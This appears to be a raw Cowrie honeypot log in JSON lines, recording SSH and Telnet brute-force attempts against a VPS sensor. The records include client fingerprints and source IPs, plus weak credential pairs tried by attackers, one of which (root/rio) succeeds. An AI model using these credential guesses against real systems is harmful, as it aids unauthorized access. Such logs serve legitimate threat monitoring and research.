{"eventid":"cowrie.login.failed","username":"mysql","password":"welcome","message":"login attempt [mysql/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:11:39.147095Z","src_ip":"212.227.235.229","session":"80668b59c034"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:11:40.956999Z","src_ip":"212.227.235.229","session":"80668b59c034"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36310,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f050220f3b8","protocol":"ssh","message":"New connection: 212.227.125.160:36310 (1.2.3.4:22) [session: 2f050220f3b8]","sensor":"my-vps","timestamp":"2025-08-31T04:11:53.970319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:11:54.518801Z","src_ip":"212.227.125.160","session":"2f050220f3b8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:11:54.519493Z","src_ip":"212.227.125.160","session":"2f050220f3b8"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"welcome","message":"login attempt [mysql/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:11:57.231376Z","src_ip":"212.227.125.160","session":"2f050220f3b8"}
{"eventid":"cowrie.session.connect","src_ip":"209.169.65.159","src_port":51582,"dst_ip":"1.2.3.4","dst_port":23,"session":"7656c713ba2e","protocol":"telnet","message":"New connection: 209.169.65.159:51582 (1.2.3.4:23) [session: 7656c713ba2e]","sensor":"my-vps","timestamp":"2025-08-31T04:11:58.406300Z"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:11:58.728632Z","src_ip":"212.227.125.160","session":"2f050220f3b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34570,"dst_ip":"1.2.3.4","dst_port":22,"session":"b955c9a0eb93","protocol":"ssh","message":"New connection: 212.227.235.229:34570 (1.2.3.4:22) [session: b955c9a0eb93]","sensor":"my-vps","timestamp":"2025-08-31T04:12:02.489040Z"}
{"eventid":"cowrie.session.connect","src_ip":"216.213.64.229","src_port":48737,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c2a2b1bd30c","protocol":"telnet","message":"New connection: 216.213.64.229:48737 (1.2.3.4:23) [session: 0c2a2b1bd30c]","sensor":"my-vps","timestamp":"2025-08-31T04:12:06.650166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:12:10.306688Z","src_ip":"212.227.235.229","session":"b955c9a0eb93"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:12:10.307494Z","src_ip":"212.227.235.229","session":"b955c9a0eb93"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-31T04:12:10.955245Z","src_ip":"212.227.125.160","session":"035d51996a7d"}
{"eventid":"cowrie.session.closed","duration":14.354339838027954,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:12.760566Z","src_ip":"209.169.65.159","session":"7656c713ba2e"}
{"eventid":"cowrie.session.closed","duration":"41.9","message":"Connection lost after 41.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:14.471339Z","src_ip":"212.227.125.160","session":"035d51996a7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53606,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ce38c32b135","protocol":"ssh","message":"New connection: 212.227.235.229:53606 (1.2.3.4:22) [session: 7ce38c32b135]","sensor":"my-vps","timestamp":"2025-08-31T04:12:31.918108Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58104,"dst_ip":"1.2.3.4","dst_port":22,"session":"f14569dc9d80","protocol":"ssh","message":"New connection: 212.227.125.160:58104 (1.2.3.4:22) [session: f14569dc9d80]","sensor":"my-vps","timestamp":"2025-08-31T04:12:32.161373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:12:32.773982Z","src_ip":"212.227.235.229","session":"7ce38c32b135"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:12:32.774624Z","src_ip":"212.227.235.229","session":"7ce38c32b135"}
{"eventid":"cowrie.session.closed","duration":30.796268701553345,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:37.446358Z","src_ip":"216.213.64.229","session":"0c2a2b1bd30c"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"abc123","message":"login attempt [mysql/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:12:38.427650Z","src_ip":"212.227.235.229","session":"7ce38c32b135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48714,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3df80f255b8","protocol":"ssh","message":"New connection: 212.227.235.229:48714 (1.2.3.4:22) [session: e3df80f255b8]","sensor":"my-vps","timestamp":"2025-08-31T04:12:38.670850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:12:38.671546Z","src_ip":"212.227.235.229","session":"e3df80f255b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:12:38.996874Z","src_ip":"212.227.235.229","session":"e3df80f255b8"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:40.552889Z","src_ip":"212.227.235.229","session":"7ce38c32b135"}
{"eventid":"cowrie.login.failed","username":"web","password":"QAZ2wsx","message":"login attempt [web/QAZ2wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T04:12:40.612832Z","src_ip":"212.227.235.229","session":"e3df80f255b8"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:42.335288Z","src_ip":"212.227.235.229","session":"e3df80f255b8"}
{"eventid":"cowrie.session.closed","duration":"20.9","message":"Connection lost after 20.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:53.109009Z","src_ip":"212.227.125.160","session":"f14569dc9d80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43666,"dst_ip":"1.2.3.4","dst_port":22,"session":"8859a8c94801","protocol":"ssh","message":"New connection: 212.227.125.160:43666 (1.2.3.4:22) [session: 8859a8c94801]","sensor":"my-vps","timestamp":"2025-08-31T04:12:53.824055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:12:54.457377Z","src_ip":"212.227.125.160","session":"8859a8c94801"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:12:54.458009Z","src_ip":"212.227.125.160","session":"8859a8c94801"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"abc123","message":"login attempt [mysql/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:12:57.243778Z","src_ip":"212.227.125.160","session":"8859a8c94801"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:12:58.645671Z","src_ip":"212.227.125.160","session":"8859a8c94801"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-31T04:13:01.439716Z","src_ip":"212.227.235.229","session":"b955c9a0eb93"}
{"eventid":"cowrie.session.closed","duration":"75.8","message":"Connection lost after 75.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:13:18.272446Z","src_ip":"212.227.235.229","session":"b955c9a0eb93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60246,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fa36bf9cf64","protocol":"ssh","message":"New connection: 212.227.235.229:60246 (1.2.3.4:22) [session: 5fa36bf9cf64]","sensor":"my-vps","timestamp":"2025-08-31T04:13:20.788381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:13:30.924290Z","src_ip":"212.227.235.229","session":"5fa36bf9cf64"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:13:30.925442Z","src_ip":"212.227.235.229","session":"5fa36bf9cf64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32802,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8a84519ed61","protocol":"ssh","message":"New connection: 212.227.235.229:32802 (1.2.3.4:22) [session: a8a84519ed61]","sensor":"my-vps","timestamp":"2025-08-31T04:13:32.477297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:13:33.144643Z","src_ip":"212.227.235.229","session":"a8a84519ed61"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:13:33.145687Z","src_ip":"212.227.235.229","session":"a8a84519ed61"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123456","message":"login attempt [odoo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:13:39.350141Z","src_ip":"212.227.235.229","session":"a8a84519ed61"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:13:41.257358Z","src_ip":"212.227.235.229","session":"a8a84519ed61"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":59541,"dst_ip":"1.2.3.4","dst_port":23,"session":"6cd5d12cd56d","protocol":"telnet","message":"New connection: 103.77.214.206:59541 (1.2.3.4:23) [session: 6cd5d12cd56d]","sensor":"my-vps","timestamp":"2025-08-31T04:13:48.227881Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47419,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0411f561d4d","protocol":"telnet","message":"New connection: 212.227.235.229:47419 (1.2.3.4:23) [session: f0411f561d4d]","sensor":"my-vps","timestamp":"2025-08-31T04:13:48.304902Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57963,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd9b7ab9028f","protocol":"telnet","message":"New connection: 212.227.235.229:57963 (1.2.3.4:23) [session: cd9b7ab9028f]","sensor":"my-vps","timestamp":"2025-08-31T04:13:48.306731Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54470,"dst_ip":"1.2.3.4","dst_port":23,"session":"e67449f76038","protocol":"telnet","message":"New connection: 212.227.125.160:54470 (1.2.3.4:23) [session: e67449f76038]","sensor":"my-vps","timestamp":"2025-08-31T04:13:51.282205Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":33145,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcc368a23c92","protocol":"telnet","message":"New connection: 103.77.214.206:33145 (1.2.3.4:23) [session: dcc368a23c92]","sensor":"my-vps","timestamp":"2025-08-31T04:13:52.276312Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50934,"dst_ip":"1.2.3.4","dst_port":22,"session":"481b87217190","protocol":"ssh","message":"New connection: 212.227.125.160:50934 (1.2.3.4:22) [session: 481b87217190]","sensor":"my-vps","timestamp":"2025-08-31T04:13:53.756716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:13:54.320689Z","src_ip":"212.227.125.160","session":"481b87217190"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:13:54.321332Z","src_ip":"212.227.125.160","session":"481b87217190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31762,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b1020f59a4b","protocol":"ssh","message":"New connection: 212.227.235.229:31762 (1.2.3.4:22) [session: 3b1020f59a4b]","sensor":"my-vps","timestamp":"2025-08-31T04:13:54.643046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:13:54.643922Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:13:54.883237Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.login.success","username":"root","password":"rio","message":"login attempt [root/rio] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:13:55.887245Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:13:56.381850Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
